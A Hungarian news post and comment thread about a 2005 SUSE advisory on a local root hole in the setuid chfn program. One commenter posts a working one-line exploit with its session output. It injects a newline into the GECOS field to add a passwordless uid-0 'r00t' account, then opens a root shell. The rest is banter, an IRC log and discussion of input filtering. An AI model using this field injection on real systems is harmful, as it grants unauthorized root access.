SuSE: pwdutils, shadow / local privilege escalation

Címkék

Egy olyan súlyos hibát jelentett be tegnap a SUSE, amely érinti a SUSE LINUX 10.0, 9.3, 9.2, 9.1, 9.0, SuSE Linux Desktop 1.0, SuSE Linux Enterprise Server 8, SUSE SLES 9 és UnitedLinux 1.0 operációs rendszereket. A hibát kihasználva a rosszindulatú helyi támadó root jogot szerezhet.Thomas Gerisch azt fedezte fel, hogy a pwdutils-ban levő setuid-os 'chfn' program elégtelenül ellenőrzi a bemenetet, miközben megváltoztatja a GECOS mezőt. Ez a hiba triviálisan kihasználható privilégium-szint emeléshez (root).

A teljes bejelentés itt.

Hozzászólások

Miután rájöttem, hogy hogyan kell kihasználni ezt a bugot (fél percig se tartott), könnyesre röhögtem magam.

Mivel máshol még nem láttam publikálva az "exploitot", ezért gondoltam elsőként megosztom a hup közöséggel... ;D



hunger@suse:~> id

uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)

hunger@suse:~> chfn -h "`echo -e ':/:/bin/sh
r00t::0:0:'`" hunger

Changing finger information for hunger.

Password:

Finger information changed

hunger@suse:~> su r00t

sh-2.05b# id

uid=0(r00t) gid=0(root) groups=0(root)

Azért elég szégyen ez 2005-ben egy vezető Linux disztribúcióban... :P

---

Hunger-: hu vazzeg, meg mindig fetrengek ezen a suse hiban

Hunger-: asszem bekuldom hup hirnek

wooh: Hunger-: Milyen suse hibat? :)

trey: kuldd be most

trey: hadd nevessunk mi is

Hunger-: ok :)

Hunger-: legyen egy kis fricska a szuper susenak :P

[...]

Hunger-: nekem meg nem volt idom kiprobalni

[...]

Hunger-: mivel ma megint talaltam egy iszonyat kernel bugot openbsdben is

Hunger-: kb. 2 perc alatt sikerult rajonni a bugra

Hunger-: de szerintem ezt mar mindenki ismerte

[...]

Hunger-: ize trey, ird meg inkabb te a suse hirt

trey: en?

Hunger-: en majd csak hozzaszolok

trey: nincs idom

trey: ird meg te

Hunger-: nem akarok nagy flamet :>

trey: ettol meg megirhatod

trey: megmondod az ordog veztte kezedet

Hunger-: :DD

feles: :D

Hunger-: lusta vagyok fogalmazni :)

trey: nalatod

Zwiebi: ezt mar nem varom vegig, inkabb elmegyek tejert :D

[...]

trey: de milyen jo hogy vannak

trey: :-D

trey: ebbol jarok partyzni

trey: apropo party

trey: keszulodnom is kell

[...]

Mojojojo ((hup.hu)) SuSE: pwdutils, shadow / local privilege escalation http://www.hup.hu/modules.php?name=News&file=article&sid=9990&mode=nested

Hunger-: lol

trey: csak a kedvedert irtam meg

Hunger-: ;-*

---

Na megyek is party-zni. Tovabbi jo kockulast :-)

Még jó, hogy itthon egyedül használom a Linuxom ezért, csak én lehetnék a "rosszindulatú lokális felhasználó" aki root jogokat szerez a saját gépén.

Mentségemre szolgál, hogy még a SuSE 7.1-en alapuló rendszer használom :-D

Azt meg nem érinti tudtommal.

Nagyapa :) Tudod, attól hogy csak te ülsz a géped előtt, azért még távolról ki tudnak használni a gépeden interneten keresztül (pl.) egy Firefox bugot, amelynek köszönhetően lokális felhasználói hozzáférést szereznek. Onnan meg mint látod, már csak egy ugrás a sugár. ;D

Btw. 7.1-ben lehet, hogy _ez_ a hiba nincs benne, viszont vannak benne jóval durvább kernel bugok, amelyekre már jóideje publikusan elérhetőek az exploitok és akkor még csak bugos suidos binárisra sincs szükség... ;P

Olyan ez, mint ha még mindig a régi DOS-os Pasteur nevű viruskeresőt használnád arra hivatkozva, hogy az már bevált, hisz annak idején megtalálta a One half vírust is. ;)

Minőségbeli különbségek vannak a hibák között...

Ha jól emlékszem a Windows JPEG exploit egy GDI+ heap memory overflow bugon alapult, amelynek a kihasználása messze nehezebb, mint ennek a suse/chfn bugnak... Elég ha csak arra gondolsz, hogy ehez még külön exploit program sem kell, elég ha bepötyögöd a shellbe. ;P

Vagy szerinted egy súlycsoport a két bug?

Amennyiben képes vagy ilyen [www.frsirt.com] exploitok írására, szerintem most jelezd, mert rengeteg cég ajánlana egyből munkát neked. ;)

In article <42.56189@c.hup.hu>, hunger wrote:
> Olyan ez, mint ha még mindig a régi DOS-os Pasteur nev? viruskeres?t
> használnád arra hivatkozva, hogy az már bevált, hisz annak idején
> megtalálta a One half vírust is. ;)

Ja, de ha jol emlexek nem irtotta ;) Vagy mittomenmelyiknem ;)

--
Gabucino

Jol sejtem, hogy egy ehhez hasonlo rendkivul bonyolult megoldassal orvosolhato lenne/lett volna a problema?

"The only restriction placed on the contents of the fields is that no control characters may be present, nor any of comma, colon, or equal sign."

Vagy erre is van valakinek instant otlete, hogy hogy lehet megkerulni... Ez egyebkent man chfn egy Ubuntun.

hát. ott fogtál egy jpg-t és ha vki megnézte, volt admin acc a gépére.

ehhez meg kell shell. melyik van gyakrabban?

úgyhogy szerintem tényleg nem voltak egy súlycsoportban, a windowsos súlyosabb volt.

egyébként egyáltalán nem vagyok képes olyan exploitok irására, csak ez a hűha égés duma nem jött be annyira :-P peace ;)

Az egyik egy viszonylag bonyolult kernel programozási hiba, amelynek a kihasználásához rendkívűl nagy szakértelem kell és ismerni kell a windows belső felépítésétől kezdve a processzor működésén át sokminden más dolgot, míg a másik bug egy sima program, amely elégtelenül ellenőrzi az egyik megadott paramétert.

Lehet, hogy távolról nézve a Windowsos hiba súlyosabbnak néz ki, de rátalálni és exploitot írni rá is nagyságrendekkel nehezebb.

Igen, nyilván a karakter készlet szűrésének a hiánya a fő probléma, hiszen már kettőspontot sem szabadna engednie bevinni, nem hogy 'új sor' karaktert... Az hogy egy ilyen ellenőrzést meg lehet-e kerülni nyilván többek közt a megvalósítástól is függ (ahogy írta miq). A programok egyre jobban összetettebbek és az emberek is úgy tűnik egyre furfangosabbak. :) Lehet, hogy az ellenőrző/szűrő algoritmus látszólag jónak tűnik, de mi van, ha az alacsonyabb szinten lévő függvény könyvtárakban van valahol kihasználható hiba? Akár a fordítóban is lehet bug...

Szerintem örök érvényű kijelentés:

No Security in this Crazy World! ;-)